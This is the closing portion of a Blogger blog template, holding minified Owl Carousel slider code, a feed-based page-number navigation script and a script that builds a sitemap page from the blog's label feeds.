4102this.currentItem+=!0===this.options.scrollPerPage?this.options.items:1;if(this.currentItem>this.maximumItem+(!0===this.options.scrollPerPage?this.options.items-1:0))if(!0===this.options.rewindNav)this.currentItem=0,a="rewind";else return this.currentItem=this.maximumItem,!1;this.goTo(this.currentItem,a)},prev:function(a){if(this.isTransition)return!1;this.currentItem=!0===this.options.scrollPerPage&&0<this.currentItem&&this.currentItem<this.options.items?0:this.currentItem-(!0===this.options.scrollPerPage?
4103this.options.items:1);if(0>this.currentItem)if(!0===this.options.rewindNav)this.currentItem=this.maximumItem,a="rewind";else return this.currentItem=0,!1;this.goTo(this.currentItem,a)},goTo:function(a,b,e){var c=this;if(c.isTransition)return!1;"function"===typeof c.options.beforeMove&&c.options.beforeMove.apply(this,[c.$elem]);a>=c.maximumItem?a=c.maximumItem:0>=a&&(a=0);c.currentItem=c.owl.currentItem=a;if(!1!==c.options.transitionStyle&&"drag"!==e&&1===c.options.items&&!0===c.browser.support3d)return c.swapSpeed(0),
4104!0===c.browser.support3d?c.transition3d(c.positionsInArray[a]):c.css2slide(c.positionsInArray[a],1),c.afterGo(),c.singleItemTransition(),!1;a=c.positionsInArray[a];!0===c.browser.support3d?(c.isCss3Finish=!1,!0===b?(c.swapSpeed("paginationSpeed"),g.setTimeout(function(){c.isCss3Finish=!0},c.options.paginationSpeed)):"rewind"===b?(c.swapSpeed(c.options.rewindSpeed),g.setTimeout(function(){c.isCss3Finish=!0},c.options.rewindSpeed)):(c.swapSpeed("slideSpeed"),g.setTimeout(function(){c.isCss3Finish=!0},
4105c.options.slideSpeed)),c.transition3d(a)):!0===b?c.css2slide(a,c.options.paginationSpeed):"rewind"===b?c.css2slide(a,c.options.rewindSpeed):c.css2slide(a,c.options.slideSpeed);c.afterGo()},jumpTo:function(a){"function"===typeof this.options.beforeMove&&this.options.beforeMove.apply(this,[this.$elem]);a>=this.maximumItem||-1===a?a=this.maximumItem:0>=a&&(a=0);this.swapSpeed(0);!0===this.browser.support3d?this.transition3d(this.positionsInArray[a]):this.css2slide(this.positionsInArray[a],1);this.currentItem=
4106this.owl.currentItem=a;this.afterGo()},afterGo:function(){this.prevArr.push(this.currentItem);this.prevItem=this.owl.prevItem=this.prevArr[this.prevArr.length-2];this.prevArr.shift(0);this.prevItem!==this.currentItem&&(this.checkPagination(),this.checkNavigation(),this.eachMoveUpdate(),!1!==this.options.autoPlay&&this.checkAp());"function"===typeof this.options.afterMove&&this.prevItem!==this.currentItem&&this.options.afterMove.apply(this,[this.$elem])},stop:function(){this.apStatus="stop";g.clearInterval(this.autoPlayInterval)},
4107checkAp:function(){"stop"!==this.apStatus&&this.play()},play:function(){var a=this;a.apStatus="play";if(!1===a.options.autoPlay)return!1;g.clearInterval(a.autoPlayInterval);a.autoPlayInterval=g.setInterval(function(){a.next(!0)},a.options.autoPlay)},swapSpeed:function(a){"slideSpeed"===a?this.$owlWrapper.css(this.addCssSpeed(this.options.slideSpeed)):"paginationSpeed"===a?this.$owlWrapper.css(this.addCssSpeed(this.options.paginationSpeed)):"string"!==typeof a&&this.$owlWrapper.css(this.addCssSpeed(a))},
4108addCssSpeed:function(a){return{"-webkit-transition":"all "+a+"ms ease","-moz-transition":"all "+a+"ms ease","-o-transition":"all "+a+"ms ease",transition:"all "+a+"ms ease"}},removeTransition:function(){return{"-webkit-transition":"","-moz-transition":"","-o-transition":"",transition:""}},doTranslate:function(a){return{"-webkit-transform":"translate3d("+a+"px, 0px, 0px)","-moz-transform":"translate3d("+a+"px, 0px, 0px)","-o-transform":"translate3d("+a+"px, 0px, 0px)","-ms-transform":"translate3d("+
4109a+"px, 0px, 0px)",transform:"translate3d("+a+"px, 0px,0px)"}},transition3d:function(a){this.$owlWrapper.css(this.doTranslate(a))},css2move:function(a){this.$owlWrapper.css({left:a})},css2slide:function(a,b){var e=this;e.isCssFinish=!1;e.$owlWrapper.stop(!0,!0).animate({left:a},{duration:b||e.options.slideSpeed,complete:function(){e.isCssFinish=!0}})},checkBrowser:function(){var a=k.createElement("div");a.style.cssText=" -moz-transform:translate3d(0px, 0px, 0px); -ms-transform:translate3d(0px, 0px, 0px); -o-transform:translate3d(0px, 0px, 0px); -webkit-transform:translate3d(0px, 0px, 0px); transform:translate3d(0px, 0px, 0px)";
4110a=a.style.cssText.match(/translate3d\(0px, 0px, 0px\)/g);this.browser={support3d:null!==a&&1===a.length,isTouch:"ontouchstart"in g||g.navigator.msMaxTouchPoints}},moveEvents:function(){if(!1!==this.options.mouseDrag||!1!==this.options.touchDrag)this.gestures(),this.disabledEvents()},eventTypes:function(){var a=["s","e","x"];this.ev_types={};!0===this.options.mouseDrag&&!0===this.options.touchDrag?a=["touchstart.owl mousedown.owl","touchmove.owl mousemove.owl","touchend.owl touchcancel.owl mouseup.owl"]:
4111!1===this.options.mouseDrag&&!0===this.options.touchDrag?a=["touchstart.owl","touchmove.owl","touchend.owl touchcancel.owl"]:!0===this.options.mouseDrag&&!1===this.options.touchDrag&&(a=["mousedown.owl","mousemove.owl","mouseup.owl"]);this.ev_types.start=a[0];this.ev_types.move=a[1];this.ev_types.end=a[2]},disabledEvents:function(){this.$elem.on("dragstart.owl",function(a){a.preventDefault()});this.$elem.on("mousedown.disableTextSelect",function(a){return f(a.target).is("input, textarea, select, option")})},
4112gestures:function(){function a(a){if(void 0!==a.touches)return{x:a.touches[0].pageX,y:a.touches[0].pageY};if(void 0===a.touches){if(void 0!==a.pageX)return{x:a.pageX,y:a.pageY};if(void 0===a.pageX)return{x:a.clientX,y:a.clientY}}}function b(a){"on"===a?(f(k).on(d.ev_types.move,e),f(k).on(d.ev_types.end,c)):"off"===a&&(f(k).off(d.ev_types.move),f(k).off(d.ev_types.end))}function e(b){b=b.originalEvent||b||g.event;d.newPosX=a(b).x-h.offsetX;d.newPosY=a(b).y-h.offsetY;d.newRelativeX=d.newPosX-h.relativePos;
4113"function"===typeof d.options.startDragging&&!0!==h.dragging&&0!==d.newRelativeX&&(h.dragging=!0,d.options.startDragging.apply(d,[d.$elem]));(8<d.newRelativeX||-8>d.newRelativeX)&&!0===d.browser.isTouch&&(void 0!==b.preventDefault?b.preventDefault():b.returnValue=!1,h.sliding=!0);(10<d.newPosY||-10>d.newPosY)&&!1===h.sliding&&f(k).off("touchmove.owl");d.newPosX=Math.max(Math.min(d.newPosX,d.newRelativeX/5),d.maximumPixels+d.newRelativeX/5);!0===d.browser.support3d?d.transition3d(d.newPosX):d.css2move(d.newPosX)}
4114function c(a){a=a.originalEvent||a||g.event;var c;a.target=a.target||a.srcElement;h.dragging=!1;!0!==d.browser.isTouch&&d.$owlWrapper.removeClass("grabbing");d.dragDirection=0>d.newRelativeX?d.owl.dragDirection="left":d.owl.dragDirection="right";0!==d.newRelativeX&&(c=d.getNewPosition(),d.goTo(c,!1,"drag"),h.targetElement===a.target&&!0!==d.browser.isTouch&&(f(a.target).on("click.disable",function(a){a.stopImmediatePropagation();a.stopPropagation();a.preventDefault();f(a.target).off("click.disable")}),
4115a=f._data(a.target,"events").click,c=a.pop(),a.splice(0,0,c)));b("off")}var d=this,h={offsetX:0,offsetY:0,baseElWidth:0,relativePos:0,position:null,minSwipe:null,maxSwipe:null,sliding:null,dargging:null,targetElement:null};d.isCssFinish=!0;d.$elem.on(d.ev_types.start,".owl-wrapper",function(c){c=c.originalEvent||c||g.event;var e;if(3===c.which)return!1;if(!(d.itemsAmount<=d.options.items)){if(!1===d.isCssFinish&&!d.options.dragBeforeAnimFinish||!1===d.isCss3Finish&&!d.options.dragBeforeAnimFinish)return!1;
4116!1!==d.options.autoPlay&&g.clearInterval(d.autoPlayInterval);!0===d.browser.isTouch||d.$owlWrapper.hasClass("grabbing")||d.$owlWrapper.addClass("grabbing");d.newPosX=0;d.newRelativeX=0;f(this).css(d.removeTransition());e=f(this).position();h.relativePos=e.left;h.offsetX=a(c).x-e.left;h.offsetY=a(c).y-e.top;b("on");h.sliding=!1;h.targetElement=c.target||c.srcElement}})},getNewPosition:function(){var a=this.closestItem();a>this.maximumItem?a=this.currentItem=this.maximumItem:0<=this.newPosX&&(this.currentItem=
4117a=0);return a},closestItem:function(){var a=this,b=!0===a.options.scrollPerPage?a.pagesInArray:a.positionsInArray,e=a.newPosX,c=null;f.each(b,function(d,g){e-a.itemWidth/20>b[d+1]&&e-a.itemWidth/20<g&&"left"===a.moveDirection()?(c=g,a.currentItem=!0===a.options.scrollPerPage?f.inArray(c,a.positionsInArray):d):e+a.itemWidth/20<g&&e+a.itemWidth/20>(b[d+1]||b[d]-a.itemWidth)&&"right"===a.moveDirection()&&(!0===a.options.scrollPerPage?(c=b[d+1]||b[b.length-1],a.currentItem=f.inArray(c,a.positionsInArray)):
4118(c=b[d+1],a.currentItem=d+1))});return a.currentItem},moveDirection:function(){var a;0>this.newRelativeX?(a="right",this.playDirection="next"):(a="left",this.playDirection="prev");return a},customEvents:function(){var a=this;a.$elem.on("owl.next",function(){a.next()});a.$elem.on("owl.prev",function(){a.prev()});a.$elem.on("owl.play",function(b,e){a.options.autoPlay=e;a.play();a.hoverStatus="play"});a.$elem.on("owl.stop",function(){a.stop();a.hoverStatus="stop"});a.$elem.on("owl.goTo",function(b,e){a.goTo(e)});
4119a.$elem.on("owl.jumpTo",function(b,e){a.jumpTo(e)})},stopOnHover:function(){var a=this;!0===a.options.stopOnHover&&!0!==a.browser.isTouch&&!1!==a.options.autoPlay&&(a.$elem.on("mouseover",function(){a.stop()}),a.$elem.on("mouseout",function(){"stop"!==a.hoverStatus&&a.play()}))},lazyLoad:function(){var a,b,e,c,d;if(!1===this.options.lazyLoad)return!1;for(a=0;a<this.itemsAmount;a+=1)b=f(this.$owlItems[a]),"loaded"!==b.data("owl-loaded")&&(e=b.data("owl-item"),c=b.find(".lazyOwl"),"string"!==typeof c.data("src")?
4120b.data("owl-loaded","loaded"):(void 0===b.data("owl-loaded")&&(c.hide(),b.addClass("loading").data("owl-loaded","checked")),(d=!0===this.options.lazyFollow?e>=this.currentItem:!0)&&e<this.currentItem+this.options.items&&c.length&&this.lazyPreload(b,c)))},lazyPreload:function(a,b){function e(){a.data("owl-loaded","loaded").removeClass("loading");b.removeAttr("data-src");"fade"===d.options.lazyEffect?b.fadeIn(400):b.show();"function"===typeof d.options.afterLazyLoad&&d.options.afterLazyLoad.apply(this,
4121[d.$elem])}function c(){f+=1;d.completeImg(b.get(0))||!0===k?e():100>=f?g.setTimeout(c,100):e()}var d=this,f=0,k;"DIV"===b.prop("tagName")?(b.css("background-image","url("+b.data("src")+")"),k=!0):b[0].src=b.data("src");c()},autoHeight:function(){function a(){var a=f(e.$owlItems[e.currentItem]).height();e.wrapperOuter.css("height",a+"px");e.wrapperOuter.hasClass("autoHeight")||g.setTimeout(function(){e.wrapperOuter.addClass("autoHeight")},0)}function b(){d+=1;e.completeImg(c.get(0))?a():100>=d?g.setTimeout(b,
4122100):e.wrapperOuter.css("height","")}var e=this,c=f(e.$owlItems[e.currentItem]).find("img"),d;void 0!==c.get(0)?(d=0,b()):a()},completeImg:function(a){return!a.complete||"undefined"!==typeof a.naturalWidth&&0===a.naturalWidth?!1:!0},onVisibleItems:function(){var a;!0===this.options.addClassActive&&this.$owlItems.removeClass("active");this.visibleItems=[];for(a=this.currentItem;a<this.currentItem+this.options.items;a+=1)this.visibleItems.push(a),!0===this.options.addClassActive&&f(this.$owlItems[a]).addClass("active");
4123this.owl.visibleItems=this.visibleItems},transitionTypes:function(a){this.outClass="owl-"+a+"-out";this.inClass="owl-"+a+"-in"},singleItemTransition:function(){var a=this,b=a.outClass,e=a.inClass,c=a.$owlItems.eq(a.currentItem),d=a.$owlItems.eq(a.prevItem),f=Math.abs(a.positionsInArray[a.currentItem])+a.positionsInArray[a.prevItem],g=Math.abs(a.positionsInArray[a.currentItem])+a.itemWidth/2;a.isTransition=!0;a.$owlWrapper.addClass("owl-origin").css({"-webkit-transform-origin":g+"px","-moz-perspective-origin":g+
4124"px","perspective-origin":g+"px"});d.css({position:"relative",left:f+"px"}).addClass(b).on("webkitAnimationEnd oAnimationEnd MSAnimationEnd animationend",function(){a.endPrev=!0;d.off("webkitAnimationEnd oAnimationEnd MSAnimationEnd animationend");a.clearTransStyle(d,b)});c.addClass(e).on("webkitAnimationEnd oAnimationEnd MSAnimationEnd animationend",function(){a.endCurrent=!0;c.off("webkitAnimationEnd oAnimationEnd MSAnimationEnd animationend");a.clearTransStyle(c,e)})},clearTransStyle:function(a,
4125b){a.css({position:"",left:""}).removeClass(b);this.endPrev&&this.endCurrent&&(this.$owlWrapper.removeClass("owl-origin"),this.isTransition=this.endCurrent=this.endPrev=!1)},owlStatus:function(){this.owl={userOptions:this.userOptions,baseElement:this.$elem,userItems:this.$userItems,owlItems:this.$owlItems,currentItem:this.currentItem,prevItem:this.prevItem,visibleItems:this.visibleItems,isTouch:this.browser.isTouch,browser:this.browser,dragDirection:this.dragDirection}},clearEvents:function(){this.$elem.off(".owl owl mousedown.disableTextSelect");
4126f(k).off(".owl owl");f(g).off("resize",this.resizer)},unWrap:function(){0!==this.$elem.children().length&&(this.$owlWrapper.unwrap(),this.$userItems.unwrap().unwrap(),this.owlControls&&this.owlControls.remove());this.clearEvents();this.$elem.attr("style",this.$elem.data("owl-originalStyles")||"").attr("class",this.$elem.data("owl-originalClasses"))},destroy:function(){this.stop();g.clearInterval(this.checkVisible);this.unWrap();this.$elem.removeData()},reinit:function(a){a=f.extend({},this.userOptions,
4127a);this.unWrap();this.init(a,this.$elem)},addItem:function(a,b){var e;if(!a)return!1;if(0===this.$elem.children().length)return this.$elem.append(a),this.setVars(),!1;this.unWrap();e=void 0===b||-1===b?-1:b;e>=this.$userItems.length||-1===e?this.$userItems.eq(-1).after(a):this.$userItems.eq(e).before(a);this.setVars()},removeItem:function(a){if(0===this.$elem.children().length)return!1;a=void 0===a||-1===a?-1:a;this.unWrap();this.$userItems.eq(a).remove();this.setVars()}};f.fn.owlCarousel=function(a){return this.each(function(){if(!0===
4128f(this).data("owl-init"))return!1;f(this).data("owl-init",!0);var b=Object.create(l);b.init(a,this);f.data(this,"owlCarousel",b)})};f.fn.owlCarousel.options={items:5,itemsCustom:!1,itemsDesktop:[1199,4],itemsDesktopSmall:[979,3],itemsTablet:[768,2],itemsTabletSmall:!1,itemsMobile:[479,1],singleItem:!1,itemsScaleUp:!1,slideSpeed:200,paginationSpeed:800,rewindSpeed:1E3,autoPlay:!1,stopOnHover:!1,navigation:!1,navigationText:["prev","next"],rewindNav:!0,scrollPerPage:!1,pagination:!0,paginationNumbers:!1,
4129responsive:!0,responsiveRefreshRate:200,responsiveBaseWidth:g,baseClass:"owl-carousel",theme:"owl-theme",lazyLoad:!1,lazyFollow:!0,lazyEffect:"fade",autoHeight:!1,jsonPath:!1,jsonSuccess:!1,dragBeforeAnimFinish:!0,mouseDrag:!0,touchDrag:!0,addClassActive:!1,transitionStyle:!1,beforeUpdate:!1,afterUpdate:!1,beforeInit:!1,afterInit:!1,beforeMove:!1,afterMove:!1,afterAction:!1,startDragging:!1,afterLazyLoad:!1}})(jQuery,window,document);
4130//]]>
4131</script>
4132
4133<b:if cond='data:blog.pageType != "static_page"'>
4134<b:if cond='data:blog.pageType!= "item"'>
4135<b:if cond='data:blog.pageType != "error_page"'>
4136<style>
4137article {
4138 padding:0;
4139}
4140.post-header {
4141 padding:0;
4142}
4143@media only screen and (max-width: 768px) {
4144article {
4145 padding:10px;
4146}
4147 }
4148</style>
4149<!--Page Navigation Starts-->
4150<script type='text/javascript'>
4151 /*<![CDATA[*/
4152 var perPage=7;
4153 var numPages=6;
4154 var firstText ='First';
4155 var lastText ='Last';
4156 var prevText ='� Previous';
4157 var nextText ='Next �';
4158 var urlactivepage=location.href;
4159 var home_page="/";
4160 /*]]>*/
4161</script>
4162<script type='text/javascript'>
4163 /*<![CDATA[*/
4164 if (typeof firstText == "undefined") firstText = "First";
4165 if (typeof lastText == "undefined") lastText = "Last";
4166 var noPage;
4167 var currentPage;
4168 var currentPageNo;
4169 var postLabel;
4170 pagecurrentg();
4171
4172 function looppagecurrentg(pageInfo) {
4173 var html = '';
4174 pageNumber = parseInt(numPages / 2);
4175 if (pageNumber == numPages - pageNumber) {
4176 numPages = pageNumber * 2 + 1
4177 }
4178 pageStart = currentPageNo - pageNumber;
4179 if (pageStart < 1) pageStart = 1;
4180 lastPageNo = parseInt(pageInfo / perPage) + 1;
4181 if (lastPageNo - 1 == pageInfo / perPage) lastPageNo = lastPageNo - 1;
4182 pageEnd = pageStart + numPages - 1;
4183 if (pageEnd > lastPageNo) pageEnd = lastPageNo;
4184 var prevNumber = parseInt(currentPageNo) - 1;
4185
4186 //Iccsi was here, doing magic
4187 if (currentPageNo > 1) {
4188 if (currentPage == "page") {
4189 html += '<span class="showpage firstpage"><a href="' + home_page + '">' + firstText + '</a></span>'
4190 } else {
4191 html += '<span class="displaypageNum firstpage"><a href="/search/label/' + postLabel + '?&max-results=' + perPage + '">' + firstText + '</a></span>'
4192 }
4193 }
4194
4195 if (currentPageNo > 2) {
4196 if (currentPageNo == 3) {
4197 if (currentPage == "page") {
4198 html += '<span class="showpage"><a href="' + home_page + '">' + prevText + '</a></span>'
4199 } else {
4200 html += '<span class="displaypageNum"><a href="/search/label/' + postLabel + '?&max-results=' + perPage + '">' + prevText + '</a></span>'
4201 }
4202 } else {
4203 if (currentPage == "page") {
4204 html += '<span class="displaypageNum"><a href="#" onclick="redirectpage(' + prevNumber + ');return false">' + prevText + '</a></span>'
4205 } else {
4206 html += '<span class="displaypageNum"><a href="#" onclick="redirectlabel(' + prevNumber + ');return false">' + prevText + '</a></span>'
4207 }
4208 }
4209 }
4210 if (pageStart > 1) {
4211 if (currentPage == "page") {
4212 html += '<span class="displaypageNum"><a href="' + home_page + '">1</a></span>'
4213 } else {
4214 html += '<span class="displaypageNum"><a href="/search/label/' + postLabel + '?&max-results=' + perPage + '">1</a></span>'
4215 }
4216 }
4217 if (pageStart > 2) {
4218 html += ' ... '
4219 }
4220 for (var jj = pageStart; jj <= pageEnd; jj++) {
4221 if (currentPageNo == jj) {
4222 html += '<span class="pagecurrent">' + jj + '</span>'
4223 } else if (jj == 1) {
4224 if (currentPage == "page") {
4225 html += '<span class="displaypageNum"><a href="' + home_page + '">1</a></span>'
4226 } else {
4227 html += '<span class="displaypageNum"><a href="/search/label/' + postLabel + '?&max-results=' + perPage + '">1</a></span>'
4228 }
4229 } else {
4230 if (currentPage == "page") {
4231 html += '<span class="displaypageNum"><a href="#" onclick="redirectpage(' + jj + ');return false">' + jj + '</a></span>'
4232 } else {
4233 html += '<span class="displaypageNum"><a href="#" onclick="redirectlabel(' + jj + ');return false">' + jj + '</a></span>'
4234 }
4235 }
4236 }
4237 if (pageEnd < lastPageNo - 1) {
4238 html += '...'
4239 }
4240 if (pageEnd < lastPageNo) {
4241 if (currentPage == "page") {
4242 html += '<span class="displaypageNum"><a href="#" onclick="redirectpage(' + lastPageNo + ');return false">' + lastPageNo + '</a></span>'
4243 } else {
4244 html += '<span class="displaypageNum"><a href="#" onclick="redirectlabel(' + lastPageNo + ');return false">' + lastPageNo + '</a></span>'
4245 }
4246 }
4247
4248
4249 var nextnumber = parseInt(currentPageNo) + 1;
4250 if (currentPageNo < (lastPageNo - 1)) {
4251 if (currentPage == "page") {
4252 html += '<span class="displaypageNum"><a href="#" onclick="redirectpage(' + nextnumber + ');return false">' + nextText + '</a></span>'
4253 } else {
4254 html += '<span class="displaypageNum"><a href="#" onclick="redirectlabel(' + nextnumber + ');return false">' + nextText + '</a></span>'
4255 }
4256 }
4257
4258 if (currentPageNo < lastPageNo) {
4259 //Iccsi was here, doing magic
4260 if (currentPage == "page") {
4261 html += '<span class="displaypageNum lastpage"><a href="#" onclick="redirectpage(' + lastPageNo + ');return false">' + lastText + '</a></span>'
4262 } else {
4263 html += '<span class="displaypageNum lastpage"><a href="#" onclick="redirectlabel(' + lastPageNo + ');return false">' + lastText + '</a></span>'
4264 }
4265 }
4266
4267 var pageArea = document.getElementsByName("pageArea");
4268 html += "<span class='showpageOf'>Page " + currentPageNo + ' of ' + lastPageNo + "</span>";
4269 var blogPager = document.getElementById("blog-pager");
4270 for (var p = 0; p < pageArea.length; p++) {
4271 pageArea[p].innerHTML = html
4272 }
4273 if (pageArea && pageArea.length > 0) {
4274 html = ''
4275 }
4276 if (blogPager) {
4277 blogPager.innerHTML = html
4278 }
4279 }
4280
4281 function totalcountdata(root) {
4282 var feed = root.feed;
4283 var totaldata = parseInt(feed.openSearch$totalResults.$t, 10);
4284 looppagecurrentg(totaldata)
4285 }
4286
4287 function pagecurrentg() {
4288 var thisUrl = urlactivepage;
4289 if (thisUrl.indexOf("/search/label/") != -1) {
4290 if (thisUrl.indexOf("?updated-max") != -1) {
4291 postLabel = thisUrl.substring(thisUrl.indexOf("/search/label/") + 14, thisUrl.indexOf("?updated-max"))
4292 } else {
4293 postLabel = thisUrl.substring(thisUrl.indexOf("/search/label/") + 14, thisUrl.indexOf("?&max"))
4294 }
4295 }
4296 if (thisUrl.indexOf("?q=") == -1 && thisUrl.indexOf(".html") == -1) {
4297 if (thisUrl.indexOf("/search/label/") == -1) {
4298 currentPage = "page";
4299 if (urlactivepage.indexOf("#PageNo=") != -1) {
4300 currentPageNo = urlactivepage.substring(urlactivepage.indexOf("#PageNo=") + 8, urlactivepage.length)
4301 } else {
4302 currentPageNo = 1
4303 }
4304 document.write("<script src=\"" + home_page + "feeds/posts/summary?max-results=1&alt=json-in-script&callback=totalcountdata\"><\/script>")
4305 } else {
4306 currentPage = "label";
4307 if (thisUrl.indexOf("&max-results=") == -1) {
4308 perPage = 20
4309 }
4310 if (urlactivepage.indexOf("#PageNo=") != -1) {
4311 currentPageNo = urlactivepage.substring(urlactivepage.indexOf("#PageNo=") + 8, urlactivepage.length)
4312 } else {
4313 currentPageNo = 1
4314 }
4315 document.write('<script src="' + home_page + 'feeds/posts/summary/-/' + postLabel + '?alt=json-in-script&callback=totalcountdata&max-results=1" ><\/script>')
4316 }
4317 }
4318 }
4319
4320 function redirectpage(numberpage) {
4321 jsonstart = (numberpage - 1) * perPage;
4322 noPage = numberpage;
4323 var nameBody = document.getElementsByTagName('head')[0];
4324 var newInclude = document.createElement('script');
4325 newInclude.type = 'text/javascript';
4326 newInclude.setAttribute("src", home_page + "feeds/posts/summary?start-index=" + jsonstart + "&max-results=1&alt=json-in-script&callback=finddatepost");
4327 nameBody.appendChild(newInclude)
4328 }
4329
4330 function redirectlabel(numberpage) {
4331 jsonstart = (numberpage - 1) * perPage;
4332 noPage = numberpage;
4333 var nameBody = document.getElementsByTagName('head')[0];
4334 var newInclude = document.createElement('script');
4335 newInclude.type = 'text/javascript';
4336 newInclude.setAttribute("src", home_page + "feeds/posts/summary/-/" + postLabel + "?start-index=" + jsonstart + "&max-results=1&alt=json-in-script&callback=finddatepost");
4337 nameBody.appendChild(newInclude)
4338 }
4339
4340 function finddatepost(root) {
4341 post = root.feed.entry[0];
4342 var timestamp1 = post.published.$t.substring(0, 19) + post.published.$t.substring(23, 29);
4343 var timestamp = encodeURIComponent(timestamp1);
4344 if (currentPage == "page") {
4345 var pAddress = "/search?updated-max=" + timestamp + "&max-results=" + perPage + "#PageNo=" + noPage
4346 } else {
4347 var pAddress = "/search/label/" + postLabel + "?updated-max=" + timestamp + "&max-results=" + perPage + "#PageNo=" + noPage
4348 }
4349 location.href = pAddress
4350 }
4351 /*]]>*/
4352</script>
4353</b:if>
4354</b:if>
4355</b:if>
4356<!--Page Navigation Ends -->
4357</body>
4358<script type='text/javascript'>
4359 //<![CDATA[
4360var text_month = [, "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov", "Dec"];
4361var no_image_url = "http://1.bp.blogspot.com/-eAeO-DYJDws/Vkqtj4HFBFI/AAAAAAAAB0o/Q5OLsyONXM0/s1600-r/nth.png";
4362
4363 var static_page_text = $.trim($('.static_page .post-body').text());
4364if (static_page_text === "[sitemap]") {
4365 var postbody = $('.static_page .post-body');
4366 $.ajax({
4367 url: "/feeds/posts/default?alt=json-in-script",
4368 type: 'get',
4369 dataType: "jsonp",
4370 success: function(dataZ) {
4371 var blogLabels = [];
4372 for (var t = 0; t < dataZ.feed.category.length; t++) {
4373 blogLabels.push(dataZ.feed.category[t].term)
4374 }
4375 var blogLabels = blogLabels.join('/');
4376 postbody.html('<div class="siteLabel"></div>');
4377 $('.static_page .post-body .siteLabel').text(blogLabels);
4378 var splabel = $(".siteLabel").text().split("/");
4379 var splabels = "";
4380 for (get = 0; get < splabel.length; ++get) {
4381 splabels += "<span>" + splabel[get] + "</span>"
4382 }
4383 $(".siteLabel").html(splabels);
4384 $('.siteLabel span').each(function() {
4385 var mapLabel = $(this);
4386 var mapLabel_text = $(this).text();
4387 $.ajax({
4388 url: "/feeds/posts/default/-/" + mapLabel_text + "?alt=json-in-script",
4389 type: 'get',
4390 dataType: "jsonp",
4391 success: function(data) {
4392 var posturl = "";
4393 var htmlcode = '<div class="mapa">';
4394 for (var i = 0; i < data.feed.entry.length; i++) {
4395 for (var j = 0; j < data.feed.entry[i].link.length; j++) {
4396 if (data.feed.entry[i].link[j].rel == "alternate") {
4397 posturl = data.feed.entry[i].link[j].href;
4398 break
4399 }
4400 }
4401 var posttitle = data.feed.entry[i].title.$t;
4402 var author = data.feed.entry[i].author[0].name.$t;
4403 var get_date = data.feed.entry[i].published.$t,
4404 year = get_date.substring(0, 4),
4405 month = get_date.substring(5, 7),
4406 day = get_date.substring(8, 10),
4407 date = text_month[parseInt(month, 10)] + ' ' + day + ', ' + year;
4408 var tag = data.feed.entry[i].category[0].term;
4409 var content = data.feed.entry[i].content.$t;
4410 var $content = $('<div>').html(content);
4411 var src2 = data.feed.entry[i].media$thumbnail.url;
4412 htmlcode += '<div class="mapapost"><div class="map-thumb"><div class="map-img"><a href="' + posturl + '" style="background:url(' + src2 + ') no-repeat center center;background-size: cover"/></div></div><h3 class="wrp-titulo"><a href="' + posturl + '">' + posttitle + '</a></h3><div class="map-meta"><span class="p-author">' + author + '</span><span class="p-date">' + date + '</span></div></div>'
4413 }
4414 htmlcode += '</div>';
4415 mapLabel.replaceWith('<div class="mapasite"><h2>' + mapLabel_text + '<span class="botao"><i class="fa fa-plus-circle"></i></span></h2>' + htmlcode + '</div>');
4416 $(document).on('click', '.mapasite h2', function() {
4417 $(this).parent('.mapasite').addClass('active');
4418 $(this).find('.botao .fa').removeClass('fa-plus-circle').addClass('fa-minus-circle');
4419 });
4420 $(document).on('click', '.mapasite.active h2', function() {
4421 $(this).parent('.mapasite').removeClass('active');
4422 $(this).find('.botao .fa').addClass('fa-plus-circle').removeClass('fa-minus-circle');
4423 });
4424 }
4425 });
4426 });
4427 }
4428 });
4429}
4430 //]]>
4431</script>
4432</html>